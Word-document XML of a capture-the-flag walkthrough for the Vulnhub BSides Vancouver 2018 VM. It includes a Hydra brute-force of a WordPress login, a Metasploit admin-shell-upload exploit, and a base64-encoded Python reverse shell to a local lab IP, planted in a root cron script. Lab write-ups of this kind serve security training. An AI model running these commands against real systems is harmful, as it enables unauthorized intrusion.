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126" w:beforeAutospacing="0" w:line="840" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/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2"/>
          <w:sz w:val="69"/>
          <w:szCs w:val="69"/>
          <w:shd w:val="clear" w:fill="FFFFFF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2"/>
          <w:sz w:val="69"/>
          <w:szCs w:val="69"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Vulnhub|BSides Vancouver: 2018 (Workshop) Walkthrough</w:t>
      </w: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2"/>
          <w:sz w:val="69"/>
          <w:szCs w:val="69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36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The BSides Vancouver: 2018 (Workshop) VM download from Vulnhub can be found here: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instrText xml:space="preserve"> HYPERLINK "https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/"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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/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t>https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/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The creator of this VM is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instrText xml:space="preserve"> HYPERLINK "https://www.vulnhub.com/author/abatchy,393/"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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/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t>abatchy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end"/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Here’s the basic description:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="420" w:beforeAutospacing="0" w:afterAutospacing="1" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pP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Boot2root challenges aim to create a safe environment where you can perform real-world penetration testing on an (intentionally) vulnerable target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="420" w:beforeAutospacing="0" w:afterAutospacing="1" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pP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This workshop will provide you with a custom-made VM where the goal is to obtain root level access on it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="420" w:beforeAutospacing="0" w:afterAutospacing="1" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pP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This is a great chance for people who want to get into pentesting but don’t know where to start. *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="420" w:beforeAutospacing="0" w:afterAutospacing="1" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pP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If this sounds intimidating, don’t worry! During the workshop, we’ll be discussing various methodologies, common pitfalls and useful tools at every step of our pentest.</w:t>
      </w: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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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  <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1. Service Enumeration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81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Using the following nmap command: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840" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:lang w:val="en-US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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap 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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F2F2F2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-sT -n -v 192.168.1.155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We find out there are 3 services running: FTP, SSH, and a web service:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF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2" name="Picture 2" descr="n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ma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  <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2. FTP Enumeration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81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The service is setup to allow for anonymous authentication with access to view a folder called “public”. Using my web browser, I can view the public directory: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3" name="Picture 3" descr="f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tp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Inside the public directory we find a back up of a text file called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users.txt.bk</w:t>
      </w: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5" name="Picture 5" descr="in file f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n file ft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/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default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  <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3. Web Enumeration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81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I ran a number of different scans against the web service. Some of these tools included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nikto, dirb, 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and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dirbuster.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 xml:space="preserve">For this exercise, just showing the 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t xml:space="preserve">wpsacn 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output I feel is sufficient since the rest is just overkill.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 xml:space="preserve">So here was the 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t xml:space="preserve">wpscan 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command and scan results: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</w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left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9" name="Picture 9" descr="wpsca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pscan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0" name="Picture 10" descr="wpsca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wpscan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1" name="Picture 11" descr="wpsca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wpscan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t>wpsacn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 xml:space="preserve"> ended up finding a robots.txt file that had a disallow entry for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/backup_wordpress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/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At this point we know there is a wordpress on that site. Loading up the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t xml:space="preserve">nikto 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tool with the following command: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840" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:spacing w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ikto -n http://192..168.1.155</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/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We got the following interesting output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/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2" name="Picture 12" descr="passfor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assforlogi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So between wordpress and this users backup file we found on the FTP service, it appears we should probably look to find the user credentials for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john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Using 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begin"/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instrText xml:space="preserve"> HYPERLINK "http://sectools.org/tool/hydra/" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:b/>
          <w:bCs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t>THC Hydra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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 a password brute forcing tool, we were able to obtain john’s password. The following hydra command was used to do so:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/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  <w:t>hydra -l john -P /root/Desktop/rockyou.txt 192.168.1.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  <w:t>155</w:t>
      </w:r>
      <w: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  <w:t xml:space="preserve"> -V http-post-form '/backup_wordpress/wp-login.php:log=^USER^&amp;pwd=^PASS^&amp;wp-submit=Log In&amp;testcookie=1:S=Location' -t 25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/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</w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/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</w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/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Breaking down the above command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="420" w:beforeAutospacing="0" w:afterAutospacing="1" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pP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-l john — specify target user is john</w:t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br w:type="textWrapping"/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-P /root/Desktop/rockyou.txt — Load the rockyou password file</w:t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br w:type="textWrapping"/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-V — Verbose mode</w:t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br w:type="textWrapping"/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http-post-form — The supported service. HTTP POST attack</w:t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br w:type="textWrapping"/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/backup_wordpress/wp-login.php: — Target URI to the login page</w:t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br w:type="textWrapping"/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log=^USER^&amp;pwd=^PASS^&amp;wp-submit=Log In&amp;testcookie=1 — The text fields for username and password. Substituing variables for hydra from above</w:t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br w:type="textWrapping"/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S=Location — Success criteria. Basically grep’s the page for “location” if found it was a successful login</w:t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br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/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-t 25 — Make 25 connection attempts. Anything higher on this VM and it breaks (trial and error)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So the scan took about 11 minutes to find the password of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enigma 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which was on line #2531 of the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rockyou.txt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 file:</w:t>
      </w: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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1146810"/>
            <wp:effectExtent l="0" t="0" r="10160" b="15240"/>
            <wp:docPr id="13" name="Picture 13" descr="1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111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  <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4. Establish Foothold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81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Loading up the metasploit framework console, I used the following exploit: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840" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F2F2F2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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>use exploit/unix/webapp/wp_admin_shell_upload</w:t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After setting all the necessary options, simply type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run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 xml:space="preserve"> to </w:t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kick off the exploit. After entering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run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 you should be presented with a meterpreter shell:</w:t>
      </w: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  <w:r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4" name="Picture 14" descr="heruplodbackdo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heruplodbackdoor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And now we have a shell running under the web service:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/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shd w:val="clear" w:fill="F2F2F2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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4638675" cy="1114425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="16" name="Picture 16" descr="2222222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22222222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361" w:beforeAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5. Privilege Escalation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181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After digging around on the machine for sometime, I found the crontab owned by root was world readable.</w:t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69230" cy="2557780"/>
            <wp:effectExtent l="0" t="0" r="7620" b="13970"/>
            <wp:docPr id="17" name="Picture 17" descr="shell+privl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ell+privlig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So root has this cleanup script that runs basically every second based on numerous leading asteriks which denotes when it should run. The cleanup script has world read,write, execute permissions (777):</w:t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4133850" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Picture 18" descr="333333333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3333333333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I proceeded to download this script from the meterpreter shell:</w:t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74310" cy="527685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="20" name="Picture 20" descr="Dawnl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awnlod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The contents of the script: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840" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>#!/bin/sh rm -rf /var/log/apache2/* # Clean those damn logs!!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Using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msfvenom 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we will replace the contents of the cleanup script with a python reverse shell using the following command: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840" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F2F2F2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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>msfvenom -p cmd/unix/reverse_python lhost=192.168.1.l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F2F2F2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">55 </w:t>
      </w:r>
      <w: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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>port=8888</w:t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69230" cy="2377440"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="21" name="Picture 21" descr="pyhhon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yhhonfil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msfvenom will then output a chunk of code that will be our reverse python shell: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840" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>python -c "exec('aW1wb3J0IHNvY2tldCAgICAsIHN1YnByb2Nlc3MgICAgLCBvcyAgOyAgICAgICAgIGhvc3Q9IjE5Mi4xNjguMS4yOSIgIDsgICAgICAgICBwb3J0PTg4ODggIDsgICAgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgLCBzb2NrZXQuU09DS19TVFJFQU0pICA7ICAgICAgICAgcy5jb25uZWN0KChob3N0ICAgICwgcG9ydCkpICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgMCkgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAxKSAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsIDIpICA7ICAgICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))"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I replaced the command previously in the cleanup script with the above python code.</w:t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74310" cy="1311275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="22" name="Picture 22" descr="44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4444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After editing in my payload, I upload the script back to the server in my meterpreter shell:</w:t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69865" cy="504190"/>
            <wp:effectExtent l="0" t="0" r="6985" b="10160"/>
            <wp:docPr id="24" name="Picture 24" descr="555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5555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Then on my Kali system I create a netcat listener on port 8888 using</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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2F2F2"/>
        <w:spacing w:before="840" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>nc -lvp 8888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After a brief moment, I receive the reverse root shell as expected:</w:t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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1166495"/>
            <wp:effectExtent l="0" t="0" r="4445" b="14605"/>
            <wp:docPr id="25" name="Picture 25" descr="66666666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6666666666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In the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/root</w:t>
      </w:r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 directory there is a flag.txt file which basically says congrats you obtained root. It also says there were numerous other ways to obtain root, did you find them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:before="420" w:beforeAutospacing="0" w:afterAutospacing="1" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r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</w:rPr>
        <w:t>There you have it!</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/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p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:fill="FFFFFF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A62CD"/>
    <w:rsid w:val="086A76FC"/>
    <w:rsid w:val="3A570DBD"/>
    <w:rsid w:val="42C07B86"/>
    <w:rsid w:val="45682593"/>
    <w:rsid w:val="547C4899"/>
    <w:rsid w:val="579147BD"/>
    <w:rsid w:val="7BCE79A4"/>
    <w:rsid w:val="7F35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Emphasis"/>
    <w:basedOn w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:iCs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basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="10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2021-04-03T16:09:12Z</dcterms:created>
  <dc:creator>96279</dc:creator>
  <cp:lastModifiedBy>96279</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-03T18:04:58Z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